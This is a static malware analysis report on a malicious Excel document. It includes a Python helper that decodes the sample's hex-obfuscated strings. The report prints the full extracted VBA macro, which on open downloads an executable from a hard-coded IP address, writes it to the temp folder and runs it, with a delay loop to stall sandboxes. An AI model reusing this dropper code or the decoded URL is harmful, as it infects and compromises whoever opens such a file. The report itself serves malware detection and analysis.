Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e6017c6355af0aed…

Verdict: MALICIOUS
File type: Office (OLE)

Size: 24.0 KB
Created (OLE metadata): 1996-10-08 23:32:33
Authoring application: Microsoft Excel
First seen: 2015-01-04
MD5: 80e98b1dbc5af0e40e4fa0b96e181c14
SHA-1: 1b7ed31c380a33fc74ee64afefa3fc9302e52d19
SHA-256: e6017c6355af0aed24b70b62c8684842f715600e75df4b279c8653f428b6cae3
Risk score: 192

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1105 Ingress Tool Transfer

The critical heuristic OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER indicates an obfuscated auto-exec VBA loader. The document exposes three auto-exec entry points (`Auto_Open`, with `AutoOpen` and `Workbook_Open` as thin aliases) that all end in `NGHDLXMAJBA`. That routine calls `IQQKFERUGKJ`, which uses `CreateObject("MSXML2.XMLHTTP")` to download a file, writes the response body to `%TEMP%\VMHKWKMKEUQ.exe`, and then instantiates `CreateObject(rbkizoliygezfbhmgfzvwmcpuezoxivwzzcoypntpwiejslmhxtqlpfoscdmougmxtvyaaddmtetta("5368656C6C2E4170706C69636174696F6E"))` and calls its `Open` method on the dropped file. The long-named function is a custom decoder: it consumes its argument two hex digits at a time and appends `Chr$(Val("&H" & pair))`, so `"5368656C6C2E4170706C69636174696F6E"` decodes to `Shell.Application`, `"54454D50"` to `TEMP`, and the hex literal assigned to `fdgBBBB` in `NGHDLXMAJBA` to the download URL `http://23.226.229.112:8080/stat/lldv.php`. `Shell.Application.Open` on an `.exe` path launches it, so the downloaded file is the second-stage payload. Each decoded byte is preceded by a `DoEvents` loop of 78 iterations that does no work; it only delays execution, which is typical anti-sandbox stalling. Two practical caveats: olevba's `--decode`/`--deobf` options handle built-in encodings (Hex, Base64, StrReverse, `Chr()` expressions) but do not evaluate a user-defined decoder, so these strings have to be recovered by reimplementing the function; and the 1996 creation timestamp is OLE SummaryInformation metadata, which is attacker-controllable and often inherited from a template, so it should not be used to date the sample. The module names `ЭтаКнига` and `Лист1`..`Лист3` are the Russian-locale defaults for ThisWorkbook and Sheet1..Sheet3, indicating the document was authored in a Russian-language Excel.
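As an added example (not part of this report and not oletools code), the following Python reimplements the sample's decoder, substitutes the plaintext back into the macro source, and re-derives the OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER verdict together with the IOCs the hex literals hide. `MACRO` is a constructed excerpt of the macros.bas shown further down (the DoEvents stall loop and the byte-array plumbing are trimmed); the function names and hex literals are the sample's own, while the sink patterns and the "auto-exec plus custom decoder plus sink visible only after decoding" rule shape are my assumptions about how such a heuristic is built, not the scanner's actual logic.

```python
"""Recover the strings behind the sample's custom hex decoder and re-derive the loader verdict.

Added example, not the report's or oletools' code. MACRO is a constructed excerpt of the
extracted macros.bas; function names and hex literals are the sample's own.
"""
import json
import re

DECODER_NAME = "rbkizoliygezfbhmgfzvwmcpuezoxivwzzcoypntpwiejslmhxtqlpfoscdmougmxtvyaaddmtetta"

# Constructed excerpt of macros.bas; __DEC__ stands in for DECODER_NAME to keep lines readable.
MACRO = r'''
Public Function __DEC__(ByVal gtretret As String) As String
  Dim i       As Long
  For i = 1 To Len(gtretret) Step 2
  __DEC__ = __DEC__ & Chr$(Val("&H" & Mid$(gtretret, i, 2)))
  Next i
 End Function
Sub Auto_Open()
NGHDLXMAJBA
End Sub
Function IQQKFERUGKJ(ByVal RGZAGVPYQAW As String, ByVal HNGYJSJELUV As String) As Boolean
    Set EYQNARIIOVP = CreateObject("MSXML2.XMLHTTP")
    EYQNARIIOVP.Open "GET", RGZAGVPYQAW, False
    Open HNGYJSJELUV For Binary As #LJDEHVYKBYP
Set GBIviviu67FUGBK = CreateObject(__DEC__("5368656C6C2E4170706C69636174696F6E"))
GBIviviu67FUGBK.Open Environ(__DEC__("54454D50")) & "\VMHKWKMKEUQ.exe"
End Function
Sub NGHDLXMAJBA()
fdgBBBB = __DEC__("687474703A2F2F32332E3232362E3232392E3131323A383038302F737461742F6C6C64762E706870")
    IQQKFERUGKJ fdgBBBB, Environ(__DEC__("54454D50")) & "\VMHKWKMKEUQ.exe"
End Sub
'''.replace("__DEC__", DECODER_NAME)

# A whole Function ... End Function block; the name is captured so calls can be rewritten.
FUNC_RE = re.compile(
    r"^[ \t]*(?:Public\s+|Private\s+)?Function\s+(\w+)\s*\(.*?^[ \t]*End Function",
    re.S | re.M | re.I)
# The decoder's fingerprint: Chr$(Val("&H" & Mid$(s, i, 2))), two hex digits per output char.
HEX_DECODER_BODY = re.compile(r'Chr\$?\(\s*Val\(\s*"&H"\s*&\s*Mid\$?\(', re.I)
AUTOEXEC_RE = re.compile(
    r"^[ \t]*(?:Public\s+|Private\s+)?Sub\s+(Auto_Open|AutoOpen|Workbook_Open|Document_Open)\s*\(",
    re.M | re.I)
# Assumed sink patterns (not the scanner's list); checked before and after deobfuscation.
SINKS = {
    "download": re.compile(r'CreateObject\("MSXML2\.XMLHTTP"\)', re.I),
    "file_write": re.compile(r"\bOpen\s+\S+\s+For\s+Binary\b", re.I),
    "execute": re.compile(r'CreateObject\("(?:Shell\.Application|WScript\.Shell)"\)', re.I),
}
URL_RE = re.compile(r"""https?://[^\s"']+""")
DROP_RE = re.compile(r'"\\([^"\\]+\.exe)"', re.I)   # e.g. "\VMHKWKMKEUQ.exe"


def vba_hex_decode(hexstr: str) -> str:
    """Python equivalent of the sample's decoder: each pair of hex digits becomes one character."""
    if len(hexstr) % 2 or not re.fullmatch(r"[0-9A-Fa-f]*", hexstr):
        raise ValueError("decoder input must be an even-length hex string")
    # Chr$() with codes 0-255 yields a single-byte (ANSI) character, hence latin-1.
    return bytes.fromhex(hexstr).decode("latin-1")


def find_decoders(src: str) -> list:
    """Names of Functions whose body has the hex-pair-to-Chr$ shape (name-independent)."""
    return [m.group(1) for m in FUNC_RE.finditer(src) if HEX_DECODER_BODY.search(m.group(0))]


def deobfuscate(src: str):
    """Replace every decoder("HEX") call with the plaintext literal; return (new_src, mapping)."""
    decoded = {}
    for name in find_decoders(src):
        call = re.compile(re.escape(name) + r'\(\s*"([0-9A-Fa-f]+)"\s*\)')

        def repl(m):
            decoded[m.group(1)] = vba_hex_decode(m.group(1))
            return '"' + decoded[m.group(1)] + '"'

        src = call.sub(repl, src)
    return src, decoded


def analyze(src: str) -> dict:
    """Re-derive an obfuscated-auto-exec-loader verdict plus the IOCs hidden by the decoder."""
    plain, decoded = deobfuscate(src)
    decoders = find_decoders(src)
    # Sinks that exist only after decoding are the ones the obfuscation was meant to hide.
    hidden = [k for k, p in SINKS.items() if p.search(plain) and not p.search(src)]
    autoexec = AUTOEXEC_RE.search(src) is not None
    return {
        "autoexec": autoexec,
        "decoders": decoders,
        "decoded": decoded,
        "hidden_sinks": hidden,
        "urls": sorted(set(URL_RE.findall(plain))),
        "dropped_files": sorted(set(DROP_RE.findall(plain))),
        "obfuscated_loader": autoexec and bool(decoders) and bool(hidden),
    }


if __name__ == "__main__":
    print(json.dumps(analyze(MACRO), indent=2))
```

Run it against the full extracted script with `analyze(open("macros.bas", encoding="utf-8").read())`. Decoders are matched by body shape rather than by name, so the random function name does not matter; a decoder built on a different primitive (numeric `Chr()` arrays, `Replace`-based junk removal) would need its own fingerprint alongside `HEX_DECODER_BODY`.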

Heuristics (8)

  • VBA macros detected [medium] OLE_VBA_MACROS (7 related findings)
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader [critical] OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source; in this sample the downloader object is left in the clear while the execution object name and the URL are hex-encoded.
    Matched line in script:
        Set EYQNARIIOVP = CreateObject("MSXML2.XMLHTTP")
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    Matched line in script:
        Set EYQNARIIOVP = CreateObject("MSXML2.XMLHTTP")
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro [low] OLE_VBA_AUTOOPEN
    Matched line in script:
        Sub AutoOpen()
  • Workbook_Open macro [low] OLE_VBA_WBOPEN
    Matched line in script:
        Sub Workbook_Open()
  • Auto_Open macro [low] OLE_VBA_AUTO
    Matched line in script:
        Sub Auto_Open()
  • Environ() call (environment variable access) [low] OLE_VBA_ENVIRON
    Matched line in script:
        GBIviviu67FUGBK.Open Environ(rbkizoliygezfbhmgfzvwmcpuezoxivwzzcoypntpwiejslmhxtqlpfoscdmougmxtvyaaddmtetta("54454D50")) & "\VMHKWKMKEUQ.exe"

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 3059 bytes
SHA-256: 7e94c6b28eb66ba054c3216714eca80c7be5857f824e046ac6c8f6dba0fd465d

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ЭтаКнига"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Public Function rbkizoliygezfbhmgfzvwmcpuezoxivwzzcoypntpwiejslmhxtqlpfoscdmougmxtvyaaddmtetta(ByVal gtretret As String) As String
  Dim i       As Long
  For i = 1 To Len(gtretret) Step 2

Dim MexzDXUy As Integer
MexzDXUy = 3
Do While MexzDXUy < 81
DoEvents: MexzDXUy = MexzDXUy + 1
Loop

  rbkizoliygezfbhmgfzvwmcpuezoxivwzzcoypntpwiejslmhxtqlpfoscdmougmxtvyaaddmtetta = rbkizoliygezfbhmgfzvwmcpuezoxivwzzcoypntpwiejslmhxtqlpfoscdmougmxtvyaaddmtetta & Chr$(Val("&H" & Mid$(gtretret, i, 2)))
  Next i
 End Function

Sub Auto_Open()
NGHDLXMAJBA
End Sub
Sub AutoOpen()
    Auto_Open
End Sub
Sub Workbook_Open()
    Auto_Open
End Sub
Function IQQKFERUGKJ(ByVal RGZAGVPYQAW As String, ByVal HNGYJSJELUV As String) As Boolean
     Dim EYQNARIIOVP As Object, GUTUPYZSTWJ As Long, LJDEHVYKBYP As Long, VCAJTUXQHLA() As Byte

    Set EYQNARIIOVP = CreateObject("MSXML2.XMLHTTP")
    EYQNARIIOVP.Open "GET", RGZAGVPYQAW, False
    EYQNARIIOVP.Send "sdfggdgdfg"


    VCAJTUXQHLA = EYQNARIIOVP.responseBody

    LJDEHVYKBYP = FreeFile

    Open HNGYJSJELUV For Binary As #LJDEHVYKBYP
    Put #LJDEHVYKBYP, , VCAJTUXQHLA
    Close #LJDEHVYKBYP
    
Set GBIviviu67FUGBK = CreateObject(rbkizoliygezfbhmgfzvwmcpuezoxivwzzcoypntpwiejslmhxtqlpfoscdmougmxtvyaaddmtetta("5368656C6C2E4170706C69636174696F6E"))
GBIviviu67FUGBK.Open Environ(rbkizoliygezfbhmgfzvwmcpuezoxivwzzcoypntpwiejslmhxtqlpfoscdmougmxtvyaaddmtetta("54454D50")) & "\VMHKWKMKEUQ.exe"
End Function
Sub NGHDLXMAJBA()
fdgBBBB = rbkizoliygezfbhmgfzvwmcpuezoxivwzzcoypntpwiejslmhxtqlpfoscdmougmxtvyaaddmtetta("687474703A2F2F32332E3232362E3232392E3131323A383038302F737461742F6C6C64762E706870")
    IQQKFERUGKJ fdgBBBB, Environ(rbkizoliygezfbhmgfzvwmcpuezoxivwzzcoypntpwiejslmhxtqlpfoscdmougmxtvyaaddmtetta("54454D50")) & "\VMHKWKMKEUQ.exe"
End Sub


Attribute VB_Name = "Лист1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Лист2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Лист3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True